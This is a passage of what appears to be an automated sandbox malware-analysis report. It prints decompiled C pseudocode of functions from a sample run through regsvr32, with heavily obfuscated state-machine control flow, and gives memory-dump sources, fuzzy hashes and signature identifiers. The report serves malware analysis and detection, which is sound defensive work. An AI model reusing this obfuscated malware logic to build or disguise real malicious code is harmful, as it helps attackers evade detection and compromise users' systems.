                                                                                                                								if(_t182 != 0x4cdc2e3) {
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_push(_t182);
                                                                                                                								_t199 = E001A303A(_t182, _v4 + _v4);
                                                                                                                								_t202 =  &(_t202[3]);
                                                                                                                								if(_t199 != 0) {
                                                                                                                									_t182 = 0x635b1bc;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t199;
                                                                                                                				}
                                                                                                                				_t182 = 0x6329fa7;
                                                                                                                				goto L10;
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: )0g$)0g$;Dh$mz
                                                                                                                • API String ID: 0-1774774541
                                                                                                                • Opcode ID: fba09aa33dc81b2521ad7f9275d737a16c6a115bb55e1870d6aaac202352e3ec
                                                                                                                • Instruction ID: e101898ae21d4d66bfb481f2b21dc3722a4c1b3d828a2d4e5cbde93e2d74b3cb
                                                                                                                • Opcode Fuzzy Hash: fba09aa33dc81b2521ad7f9275d737a16c6a115bb55e1870d6aaac202352e3ec
                                                                                                                • Instruction Fuzzy Hash: 837130B5508381AFD398DE61C88991FBBE5BBD4B48F409A1DF59696220C3B58A09CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E001B3983(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				intOrPtr _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				char _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				void* _t115;
                                                                                                                				intOrPtr _t129;
                                                                                                                				void* _t133;
                                                                                                                				void* _t135;
                                                                                                                				signed int _t152;
                                                                                                                				signed int _t153;
                                                                                                                				signed int _t154;
                                                                                                                				intOrPtr _t156;
                                                                                                                				signed int* _t160;
                                                                                                                
                                                                                                                				_t133 = __ecx;
                                                                                                                				_push(1);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(1);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t115);
                                                                                                                				_v12 = 0x41da6b;
                                                                                                                				_t156 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				_t160 =  &(( &_v64)[7]);
                                                                                                                				_v4 = 0;
                                                                                                                				_v64 = 0x294700;
                                                                                                                				_t135 = 0x9ff2b4c;
                                                                                                                				_v64 = _v64 >> 0xf;
                                                                                                                				_t152 = 0x6e;
                                                                                                                				_v64 = _v64 * 0x2a;
                                                                                                                				_v64 = _v64 + 0x5a2;
                                                                                                                				_v64 = _v64 ^ 0x000e651d;
                                                                                                                				_v60 = 0x371836;
                                                                                                                				_v60 = _v60 * 0x3b;
                                                                                                                				_v60 = _v60 * 0x12;
                                                                                                                				_v60 = _v60 / _t152;
                                                                                                                				_v60 = _v60 ^ 0x021e3430;
                                                                                                                				_v28 = 0x4ed677;
                                                                                                                				_v28 = _v28 | 0x7188ef15;
                                                                                                                				_v28 = _v28 ^ 0x71ce2d2d;
                                                                                                                				_v32 = 0xcadbea;
                                                                                                                				_v32 = _v32 >> 7;
                                                                                                                				_v32 = _v32 ^ 0x0008d24b;
                                                                                                                				_v36 = 0xf02df2;
                                                                                                                				_v36 = _v36 + 0x566c;
                                                                                                                				_v36 = _v36 ^ 0x00f108d9;
                                                                                                                				_v44 = 0x63cd57;
                                                                                                                				_v44 = _v44 | 0xe6bbd512;
                                                                                                                				_v44 = _v44 + 0xffff0330;
                                                                                                                				_v44 = _v44 ^ 0xe6fcaa9b;
                                                                                                                				_v40 = 0x934bf;
                                                                                                                				_v40 = _v40 << 4;
                                                                                                                				_v40 = _v40 ^ 0x00958d08;
                                                                                                                				_v48 = 0x1e0eea;
                                                                                                                				_v48 = _v48 | 0x84c1d32c;
                                                                                                                				_t153 = 0x43;
                                                                                                                				_v48 = _v48 / _t153;
                                                                                                                				_v48 = _v48 ^ 0x01f176cb;
                                                                                                                				_v52 = 0x2602b8;
                                                                                                                				_v52 = _v52 << 0xc;
                                                                                                                				_v52 = _v52 | 0xcd7804e5;
                                                                                                                				_v52 = _v52 ^ 0xed7892aa;
                                                                                                                				_v56 = 0x734130;
                                                                                                                				_v56 = _v56 + 0x6d5c;
                                                                                                                				_t154 = 0x7e;
                                                                                                                				_v56 = _v56 / _t154;
                                                                                                                				_v56 = _v56 << 5;
                                                                                                                				_v56 = _v56 ^ 0x001529a1;
                                                                                                                				_v20 = 0x70e836;
                                                                                                                				_v20 = _v20 | 0x575d0273;
                                                                                                                				_v20 = _v20 ^ 0x57704dbf;
                                                                                                                				_v24 = 0xa086a;
                                                                                                                				_v24 = _v24 + 0x14e8;
                                                                                                                				_v24 = _v24 ^ 0x000556de;
                                                                                                                				_t155 = _v16;
                                                                                                                				do {
                                                                                                                					while(_t135 != 0x751618) {
                                                                                                                						if(_t135 == 0x1cb3211) {
                                                                                                                							_t129 = E001C131D();
                                                                                                                							_t155 = _t129;
                                                                                                                							if(_t129 != 0xffffffff) {
                                                                                                                								_t135 = 0x751618;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t135 == 0x9ff2b4c) {
                                                                                                                								_t135 = 0x1cb3211;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t135 == 0xc44e196) {
                                                                                                                									E001ACBBF(_v32, _v36, _a8, 1, _v44, 1, _t135, _v16, _v40, _v48, _v52, _t133);
                                                                                                                									_t160 =  &(_t160[0xa]);
                                                                                                                									_t135 = 0xdd45aa6;
                                                                                                                									_t156 =  !=  ? 1 : _t156;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									if(_t135 != 0xdd45aa6) {
                                                                                                                										goto L15;
                                                                                                                									} else {
                                                                                                                										E001B02D8(_v16, _v56, _v20, _v24);
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L7:
                                                                                                                						return _t156;
                                                                                                                					}
                                                                                                                					if(E001BEC35(_t155, _v60, _v28,  &_v16) == 0) {
                                                                                                                						_t135 = 0xa6a72b0;
                                                                                                                						goto L15;
                                                                                                                					} else {
                                                                                                                						_t135 = 0xc44e196;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					goto L7;
                                                                                                                					L15:
                                                                                                                				} while (_t135 != 0xa6a72b0);
                                                                                                                				goto L7;
                                                                                                                			}





























                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0As$6p$\m$lV
                                                                                                                • API String ID: 0-925760428
                                                                                                                • Opcode ID: dee23f884468536b0a5b5edf1e1d81506725524f780b5c5b8c18997d6d46b82b
                                                                                                                • Instruction ID: 2a510bd481f695dc61ad15f0c1951ece55fb11777a0bca8b0dd71a2aa67f53d4
                                                                                                                • Opcode Fuzzy Hash: dee23f884468536b0a5b5edf1e1d81506725524f780b5c5b8c18997d6d46b82b
                                                                                                                • Instruction Fuzzy Hash: B3615571108341AFC358CE25C98945BBFE6FFD4368F604A1DF59696260C3B5DA498F83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002B47F(intOrPtr* __ecx, void* __eflags, long _a4) {
                                                                                                                				long _t8;
                                                                                                                				void* _t9;
                                                                                                                				short _t10;
                                                                                                                				intOrPtr _t11;
                                                                                                                				long _t12;
                                                                                                                				long _t18;
                                                                                                                				intOrPtr* _t25;
                                                                                                                
                                                                                                                				_t18 = _a4;
                                                                                                                				_t25 = __ecx;
                                                                                                                				if(E10017E39(__ecx, __eflags, _t18) == 0) {
                                                                                                                					_t8 = SendMessageA( *(__ecx + 0x20), 0x476, 0, 0);
                                                                                                                					__eflags = _t8;
                                                                                                                					if(_t8 != 0) {
                                                                                                                						__eflags =  *((intOrPtr*)(_t18 + 4)) - 0x100;
                                                                                                                						if( *((intOrPtr*)(_t18 + 4)) != 0x100) {
                                                                                                                							L11:
                                                                                                                							_t9 = E1001839A(_t18);
                                                                                                                							L12:
                                                                                                                							return _t9;
                                                                                                                						}
                                                                                                                						_t10 = GetAsyncKeyState(0x11);
                                                                                                                						__eflags = _t10;
                                                                                                                						if(_t10 >= 0) {
                                                                                                                							goto L11;
                                                                                                                						}
                                                                                                                						_t11 =  *((intOrPtr*)(_t18 + 8));
                                                                                                                						__eflags = _t11 - 9;
                                                                                                                						if(_t11 == 9) {
                                                                                                                							L9:
                                                                                                                							_t12 = SendMessageA( *(_t25 + 0x20), 0x475, 0, _t18);
                                                                                                                							__eflags = _t12;
                                                                                                                							if(_t12 == 0) {
                                                                                                                								goto L11;
                                                                                                                							}
                                                                                                                							L10:
                                                                                                                							_t9 = 1;
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						__eflags = _t11 - 0x21;
                                                                                                                						if(_t11 == 0x21) {
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						__eflags = _t11 - 0x22;
                                                                                                                						if(_t11 != 0x22) {
                                                                                                                							goto L11;
                                                                                                                						}
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *_t25 + 0x60))();
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: cdfd7cf99aca2536526c47757dd245ea40762f0b833d22b57554424f1fedac50
                                                                                                                • Instruction ID: add0b43d62b0f5ebaa968ad4f88f68ea6391617411a4e3041e67fea6ca7b721a
                                                                                                                • Opcode Fuzzy Hash: cdfd7cf99aca2536526c47757dd245ea40762f0b833d22b57554424f1fedac50
                                                                                                                • Instruction Fuzzy Hash: 8D018471740A46A7D760FA26ACC1F2B62D8FB487C4FD14425FA45DB692DB70DC418660
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E100504E2() {
                                                                                                                				signed int _v8;
                                                                                                                				char _v16;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t8;
                                                                                                                				intOrPtr* _t15;
                                                                                                                				intOrPtr _t16;
                                                                                                                				char _t20;
                                                                                                                				intOrPtr _t22;
                                                                                                                				intOrPtr _t23;
                                                                                                                				signed int _t24;
                                                                                                                				int _t25;
                                                                                                                				signed int _t27;
                                                                                                                
                                                                                                                				_t8 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t8 ^ _t27;
                                                                                                                				_t24 = 0;
                                                                                                                				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
                                                                                                                					L4:
                                                                                                                					_t25 = GetACP();
                                                                                                                				} else {
                                                                                                                					_t20 = _v16;
                                                                                                                					_t15 =  &_v16;
                                                                                                                					if(_t20 == 0) {
                                                                                                                						goto L4;
                                                                                                                					} else {
                                                                                                                						do {
                                                                                                                							_t15 = _t15 + 1;
                                                                                                                							_t24 = _t24 * 0xa + _t20 - 0x30;
                                                                                                                							_t20 =  *_t15;
                                                                                                                						} while (_t20 != 0);
                                                                                                                						if(_t24 == 0) {
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E1003B437(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • GetThreadLocale.KERNEL32 ref: 100504F5
                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10050507
                                                                                                                • GetACP.KERNEL32 ref: 10050530
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$InfoThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232894706-0
                                                                                                                • Opcode ID: df4e6de48619319cec469c3dc7a3750b232d842b0f83f7f6d72983e0651ab34c
                                                                                                                • Instruction ID: fb023d138c63cbcd0f5eb6b343bbe587d03a5afb79beba185f8be65564275fb1
                                                                                                                • Opcode Fuzzy Hash: df4e6de48619319cec469c3dc7a3750b232d842b0f83f7f6d72983e0651ab34c
                                                                                                                • Instruction Fuzzy Hash: E1F0C231E00A689BEB15DF749965AEF77E4EB08B81F41415DE981E7240EA20AD08CBC4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E100175E3(struct HWND__* _a4, signed int _a8) {
                                                                                                                				struct _WINDOWPLACEMENT _v48;
                                                                                                                				int _t16;
                                                                                                                
                                                                                                                				if(E100174A2() == 0) {
                                                                                                                					if((_a8 & 0x00000003) == 0) {
                                                                                                                						if(IsIconic(_a4) == 0) {
                                                                                                                							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                                                                                                                						} else {
                                                                                                                							_t16 = GetWindowPlacement(_a4,  &_v48);
                                                                                                                						}
                                                                                                                						if(_t16 == 0) {
                                                                                                                							return 0;
                                                                                                                						} else {
                                                                                                                							return E10017597( &(_v48.rcNormalPosition), _a8);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return 0x12340042;
                                                                                                                				}
                                                                                                                				return  *0x1007094c(_a4, _a8);
                                                                                                                			}






                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df7d4e2dfb66cc90b1d9a218e20c7df51814343b9a35adcfa3141255191a6ac1
                                                                                                                • Instruction ID: 21e17db689f8d27aef5e8d1d2dc2d4cfa505b85111c41e41ad2976879c8eaef7
                                                                                                                • Opcode Fuzzy Hash: df7d4e2dfb66cc90b1d9a218e20c7df51814343b9a35adcfa3141255191a6ac1
                                                                                                                • Instruction Fuzzy Hash: 24F03731504919ABDF42DF69CC44AAE3BB9FB04280F008020FC1ED9060EB30DA94EB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001AE65A(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				char _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				intOrPtr _v72;
                                                                                                                				intOrPtr _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				unsigned int _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				void* _t213;
                                                                                                                				signed int _t242;
                                                                                                                				signed int _t251;
                                                                                                                				signed int _t252;
                                                                                                                				signed int _t253;
                                                                                                                				void* _t256;
                                                                                                                				signed int* _t285;
                                                                                                                				signed int* _t289;
                                                                                                                				void* _t291;
                                                                                                                
                                                                                                                				_t286 = _a8;
                                                                                                                				_push(_a16);
                                                                                                                				_t285 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t213);
                                                                                                                				_v76 = 0x5b7bde;
                                                                                                                				_v72 = 0x9e824a;
                                                                                                                				_t289 =  &(( &_v164)[6]);
                                                                                                                				_v68 = 0;
                                                                                                                				_v64 = 0;
                                                                                                                				_t256 = 0x6eaba5f;
                                                                                                                				_v148 = 0xdab969;
                                                                                                                				_v148 = _v148 << 6;
                                                                                                                				_t251 = 0x17;
                                                                                                                				_v148 = _v148 * 0x52;
                                                                                                                				_v148 = _v148 * 0x46;
                                                                                                                				_v148 = _v148 ^ 0x0d4f9300;
                                                                                                                				_v136 = 0x27c2e4;
                                                                                                                				_v136 = _v136 >> 4;
                                                                                                                				_v136 = _v136 * 0x6b;
                                                                                                                				_v136 = _v136 ^ 0x01037311;
                                                                                                                				_v132 = 0xa04c98;
                                                                                                                				_v132 = _v132 >> 0xb;
                                                                                                                				_v132 = _v132 + 0xffff4d8d;
                                                                                                                				_v132 = _v132 ^ 0xfff6ffa9;
                                                                                                                				_v84 = 0xd10a51;
                                                                                                                				_v84 = _v84 << 9;
                                                                                                                				_v84 = _v84 ^ 0xa2153ab8;
                                                                                                                				_v112 = 0xa98344;
                                                                                                                				_v112 = _v112 / _t251;
                                                                                                                				_v112 = _v112 ^ 0x0006eca6;
                                                                                                                				_v156 = 0x3dda3;
                                                                                                                				_v156 = _v156 + 0xffff147f;
                                                                                                                				_v156 = _v156 + 0xffffabbe;
                                                                                                                				_v156 = _v156 * 0x67;
                                                                                                                				_v156 = _v156 ^ 0x0108e493;
                                                                                                                				_v92 = 0x46f6b8;
                                                                                                                				_v92 = _v92 ^ 0x63dca969;
                                                                                                                				_v92 = _v92 ^ 0x63948aed;
                                                                                                                				_v164 = 0x902182;
                                                                                                                				_v164 = _v164 << 0x10;
                                                                                                                				_v164 = _v164 + 0xebef;
                                                                                                                				_v164 = _v164 | 0x5c2ac9ae;
                                                                                                                				_v164 = _v164 ^ 0x7da23f1f;
                                                                                                                				_v152 = 0xe266ce;
                                                                                                                				_v152 = _v152 + 0xffff810a;
                                                                                                                				_v152 = _v152 * 0x16;
                                                                                                                				_v152 = _v152 | 0x56231c8f;
                                                                                                                				_v152 = _v152 ^ 0x576a61ed;
                                                                                                                				_v144 = 0xfc046b;
                                                                                                                				_v144 = _v144 ^ 0x3c6a7872;
                                                                                                                				_v144 = _v144 + 0xffff2d66;
                                                                                                                				_v144 = _v144 * 7;
                                                                                                                				_v144 = _v144 ^ 0xa816138e;
                                                                                                                				_v160 = 0x34b1e2;
                                                                                                                				_v160 = _v160 + 0xffff64d6;
                                                                                                                				_v160 = _v160 * 0x77;
                                                                                                                				_v160 = _v160 | 0x0dfe631e;
                                                                                                                				_v160 = _v160 ^ 0x1dfb1317;
                                                                                                                				_v80 = 0xaf3010;
                                                                                                                				_v80 = _v80 << 8;
                                                                                                                				_v80 = _v80 ^ 0xaf327599;
                                                                                                                				_v120 = 0xfedbf9;
                                                                                                                				_v120 = _v120 ^ 0xe704677a;
                                                                                                                				_v120 = _v120 >> 5;
                                                                                                                				_v120 = _v120 ^ 0x07381b6c;
                                                                                                                				_v100 = 0xeb06c6;
                                                                                                                				_v100 = _v100 + 0xb0e7;
                                                                                                                				_v100 = _v100 ^ 0x00e60522;
                                                                                                                				_v128 = 0x88ceae;
                                                                                                                				_v128 = _v128 + 0xffff84b1;
                                                                                                                				_v128 = _v128 ^ 0x3062550a;
                                                                                                                				_v128 = _v128 ^ 0x30e87eef;
                                                                                                                				_v124 = 0x8d7a77;
                                                                                                                				_t252 = 0x11;
                                                                                                                				_v124 = _v124 / _t252;
                                                                                                                				_v124 = _v124 + 0xffff2079;
                                                                                                                				_v124 = _v124 ^ 0x000c21db;
                                                                                                                				_v116 = 0x54d058;
                                                                                                                				_v116 = _v116 | 0x16fcd649;
                                                                                                                				_v116 = _v116 << 3;
                                                                                                                				_v116 = _v116 ^ 0xb7eba66c;
                                                                                                                				_v96 = 0xde7508;
                                                                                                                				_v96 = _v96 | 0x62922a1e;
                                                                                                                				_v96 = _v96 ^ 0x62dd35db;
                                                                                                                				_v104 = 0x604f99;
                                                                                                                				_v104 = _v104 << 0xd;
                                                                                                                				_v104 = _v104 ^ 0x09fd2078;
                                                                                                                				_v108 = 0xc4a9bc;
                                                                                                                				_t253 = 0x39;
                                                                                                                				_v108 = _v108 / _t253;
                                                                                                                				_v108 = _v108 ^ 0x000ac116;
                                                                                                                				_v140 = 0x735c94;
                                                                                                                				_v140 = _v140 + 0x7295;
                                                                                                                				_v140 = _v140 ^ 0xc45e4222;
                                                                                                                				_v140 = _v140 * 0x1c;
                                                                                                                				_v140 = _v140 ^ 0x74f018e0;
                                                                                                                				_v88 = 0x4dc8ff;
                                                                                                                				_v88 = _v88 << 0xc;
                                                                                                                				_v88 = _v88 ^ 0xdc83807a;
                                                                                                                				goto L1;
                                                                                                                				do {
                                                                                                                					while(1) {
                                                                                                                						L1:
                                                                                                                						_t291 = _t256 - 0x4c0c206;
                                                                                                                						if(_t291 > 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						if(_t291 == 0) {
                                                                                                                							E001A4E8F(_t286 + 0x1c,  &_v60, __eflags, _v140, _v88);
                                                                                                                						} else {
                                                                                                                							if(_t256 == 0x120f8e0) {
                                                                                                                								_push(_t256);
                                                                                                                								_t242 = E001A303A(_t256, _t285[1]);
                                                                                                                								_t289 =  &(_t289[3]);
                                                                                                                								 *_t285 = _t242;
                                                                                                                								__eflags = _t242;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_t256 = 0xb738352;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t256 == 0x271f41d) {
                                                                                                                									E001AE4D8(_v160,  *((intOrPtr*)(_t286 + 0x48)),  &_v60, _v80);
                                                                                                                									_t289 =  &(_t289[2]);
                                                                                                                									_t256 = 0x3e9745f;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									if(_t256 == 0x3e9745f) {
                                                                                                                										E001AE4D8(_v120,  *((intOrPtr*)(_t286 + 0x24)),  &_v60, _v100);
                                                                                                                										_t289 =  &(_t289[2]);
                                                                                                                										_t256 = 0x43c3571;
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										if(_t256 == 0x43c3571) {
                                                                                                                											E001AE4D8(_v128,  *((intOrPtr*)(_t286 + 0x3c)),  &_v60, _v124);
                                                                                                                											_t289 =  &(_t289[2]);
                                                                                                                											_t256 = 0x62d2c19;
                                                                                                                											continue;
                                                                                                                										} else {
                                                                                                                											if(_t256 != 0x45a5391) {
                                                                                                                												goto L24;
                                                                                                                											} else {
                                                                                                                												_t285[1] = E001A1DCA(_t286);
                                                                                                                												_t256 = 0x120f8e0;
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L27:
                                                                                                                						__eflags =  *_t285;
                                                                                                                						_t212 =  *_t285 != 0;
                                                                                                                						__eflags = _t212;
                                                                                                                						return 0 | _t212;
                                                                                                                					}
                                                                                                                					__eflags = _t256 - 0x62d2c19;
                                                                                                                					if(_t256 == 0x62d2c19) {
                                                                                                                						E001AE4D8(_v116,  *((intOrPtr*)(_t286 + 0xc)),  &_v60, _v96);
                                                                                                                						_t289 =  &(_t289[2]);
                                                                                                                						_t256 = 0x77ec616;
                                                                                                                						goto L24;
                                                                                                                					} else {
                                                                                                                						__eflags = _t256 - 0x6eaba5f;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t256 = 0x45a5391;
                                                                                                                							 *_t285 = 0;
                                                                                                                							_t285[1] = _v148;
                                                                                                                							goto L1;
                                                                                                                						} else {
                                                                                                                							__eflags = _t256 - 0x77ec616;
                                                                                                                							if(_t256 == 0x77ec616) {
                                                                                                                								E001AE4D8(_v104,  *((intOrPtr*)(_t286 + 0x28)),  &_v60, _v108);
                                                                                                                								_t289 =  &(_t289[2]);
                                                                                                                								_t256 = 0x4c0c206;
                                                                                                                								goto L1;
                                                                                                                							} else {
                                                                                                                								__eflags = _t256 - 0xb738352;
                                                                                                                								if(_t256 == 0xb738352) {
                                                                                                                									E001A6DD9( &_v60, _v156, _v92, _t285, _v164);
                                                                                                                									_t289 =  &(_t289[3]);
                                                                                                                									_t256 = 0xd6a58b7;
                                                                                                                									goto L1;
                                                                                                                								} else {
                                                                                                                									__eflags = _t256 - 0xd6a58b7;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										goto L24;
                                                                                                                									} else {
                                                                                                                										E001A4E8F(_t286 + 0x10,  &_v60, __eflags, _v152, _v144);
                                                                                                                										_t256 = 0x271f41d;
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					goto L27;
                                                                                                                					L24:
                                                                                                                					__eflags = _t256 - 0x8f7bf09;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L27;
                                                                                                                			}








































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: rxj<$ajW$~0
                                                                                                                • API String ID: 0-4188916868
                                                                                                                • Opcode ID: acaebf906b5d1b4fb3e6917d85a80d437da6bad1f0f4abfd0e3e441dfc5d7667
                                                                                                                • Instruction ID: 0587d49a0e03f586e2396d6ad9a571e08ac89ea8d3029e334ad78c6c14c31dac
                                                                                                                • Opcode Fuzzy Hash: acaebf906b5d1b4fb3e6917d85a80d437da6bad1f0f4abfd0e3e441dfc5d7667
                                                                                                                • Instruction Fuzzy Hash: A0C132B54083819FC368CF64C58982FBBE1BBD9748F104A1EF29696261D7B1DA09CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001B2B1F(void* __edx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                				char _v16;
